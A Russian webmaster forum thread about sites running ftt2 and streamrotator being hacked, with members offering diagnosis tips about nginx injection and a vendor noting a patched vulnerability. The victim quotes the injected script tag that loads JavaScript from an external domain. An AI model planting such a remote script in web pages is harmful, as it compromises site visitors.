Реклама на сайте Advertise with us

Взломали несколько доменов. ftt2 streamrotator

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 16.07.09
Сообщения: 180
Рейтинг: 188

Ссылка на сообщениеДобавлено: 19/09/19 в 14:16       Ответить с цитатойцитата 

привет
на странцах сайта на ftt2 и streamrotator вижу чужеродный код после <base target=_blank>

в темплейтах этого кода нет, в кэше streamrotator тож нету

кто то сталкивался?

где искать корень проблемы? как лечить?

спасибо!

3
 



С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609

Ссылка на сообщениеДобавлено: 19/09/19 в 17:51       Ответить с цитатойцитата 

поищи файлы которые правили ,

вот пример: поиск файла который правили с 17 августа с 11:35 до 12:17

find /path/to/dir/ -mindepth 1 -newermt '2019-08-17 11:35' ! -newermt '2019-08-17 12:17' -ls



зы если у тебя vps то многих сейчас ломают через дрявый exim

если он стоит надо его обновлять

6
 



С нами с 16.07.09
Сообщения: 180
Рейтинг: 188

Ссылка на сообщениеДобавлено: 19/09/19 в 21:44       Ответить с цитатойцитата 

пасиб, Alexs
exim не при делах, вроде бы.

по поводу изменённых файлов - по всему серваку что ли искать?...

дело тут вот какое

есть, к примеру файл, всё его содержимое:
<base target=_blank>
файл создал вручную, он никаким боком не касается ни стрима ни фтт.

когда открываю файл в браузере - после <base target=_blank> добавляется
<script data-cfasync="false" type="text/javascript" src="//tsyndolls.com/t/9/fret/meow4/1595466/brt.js"></script>

это точно не мой код.

вопрос - кто его добавляет? apache? nginx?

1
 
+


С нами с 09.05.17
Сообщения: 661
Рейтинг: 586


Передовик Master-X (01.08.2017) Передовик Master-X (01.02.2018) Передовик Master-X (16.10.2019) Передовик Master-X (01.11.2019)
Ссылка на сообщениеДобавлено: 19/09/19 в 21:47       Ответить с цитатойцитата 

theman:

да, на nginx это возможно сделать через http://nginx.org/en/docs/http/ngx_http_sub_module.html , чекни конфиги nginx


p.s. апач тоже умеет https://www.askapache.com/htaccess-file/directive/indexheadinsert/

Покупаем пуш траффик
GoPusher 2 - рули своими пуш подписчиками

6
 

Прожигатель жизни

С нами с 20.10.05
Сообщения: 942
Рейтинг: 638

Ссылка на сообщениеДобавлено: 20/09/19 в 08:25       Ответить с цитатойцитата 

А ты страницу смотришь именно как view source или через inspect?
Если второй вариант, то скорее всего какой-то другой JS добавляет его.

6
 



С нами с 16.07.09
Сообщения: 180
Рейтинг: 188

Ссылка на сообщениеДобавлено: 26/09/19 в 15:29       Ответить с цитатойцитата 

Oswell E. Spencer, спасибо за ссылки
в конфигах nginx нет ничего лишнего. вставил замену по правилам, указанным по ссылке - пропал чужеродный код. прошло пару дней - опять появился. правило, которое я вставил в конфиг при этом - пропало из конфига icon_rolleyes.gif

вставил правило повторно - смотрю.


Anab0L1k, код вижу в page source, не в инспекте. хотя в инспекте код посторонний тож присутствует

0
 



С нами с 16.07.09
Сообщения: 180
Рейтинг: 188

Ссылка на сообщениеДобавлено: 26/09/19 в 15:34       Ответить с цитатойцитата 

вот я кстати смотрю, что скорее не правила, мной добавленные, а просто тупо рестарт nginx избавляет от внедрения постороннего кода в страницы.
какие есть мысли, парни? чё делать дальше?

0
 



С нами с 28.02.03
Сообщения: 8544
Рейтинг: 1609

Ссылка на сообщениеДобавлено: 27/09/19 в 15:49       Ответить с цитатойцитата 

theman писал:
вот я кстати смотрю, что скорее не правила, мной добавленные, а просто тупо рестарт nginx избавляет от внедрения постороннего кода в страницы.
какие есть мысли, парни? чё делать дальше?


https://habr.com/ru/post/465355/

буквально не давно читал занятную статью, как чуваку залили nginx с блэкджеком и
шлюхами

по хорошему Я бы приставил систему
ну или как минимум переставил nginx и обновил систему

1
 
+ + +


С нами с 28.10.11
Сообщения: 564
Рейтинг: -127

Ссылка на сообщениеДобавлено: 17/01/20 в 03:18       Ответить с цитатойцитата 

Alexs писал:
https://habr.com/ru/post/465355/

буквально не давно читал занятную статью, как чуваку залили nginx с блэкджеком и
шлюхами

по хорошему Я бы приставил систему
ну или как минимум переставил nginx и обновил систему

в статье так и не сказали как получили доступ к серверу

0
 



С нами с 12.04.02
Сообщения: 10405
Рейтинг: 908


Передовик Master-X (01.10.2012)
Ссылка на сообщениеДобавлено: 21/01/20 в 05:30       Ответить с цитатойцитата 

похоже тоже поломали нах ! админка выдает 404 так же го пхп 404 а страницы есть. у друга на моем сервак свой акк там все пашет у меня нет
подскажите в скайпе Серч или кто там с ссаппорта есть ? вроде в скайпе раньше общались а в асе его с суботы не было

0
 



С нами с 23.11.02
Сообщения: 154
Рейтинг: 90

Ссылка на сообщениеДобавлено: 22/01/20 в 13:10       Ответить с цитатойцитата 

Найдена серьезная уязвимость в ftt2. Рекомендуется проапдейтиться до последней версии (2.3.6). Там она исправлена.

Total Traffic Trader

4
 



С нами с 12.04.02
Сообщения: 10405
Рейтинг: 908


Передовик Master-X (01.10.2012)
Ссылка на сообщениеДобавлено: 23/01/20 в 05:36       Ответить с цитатойцитата 

снова 404 опять поломали бляди

0
 



С нами с 20.10.04
Сообщения: 3851
Рейтинг: 1044


Передовик Master-X (01.03.2020)
Ссылка на сообщениеДобавлено: 24/01/20 в 08:15       Ответить с цитатойцитата 

ошибка

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »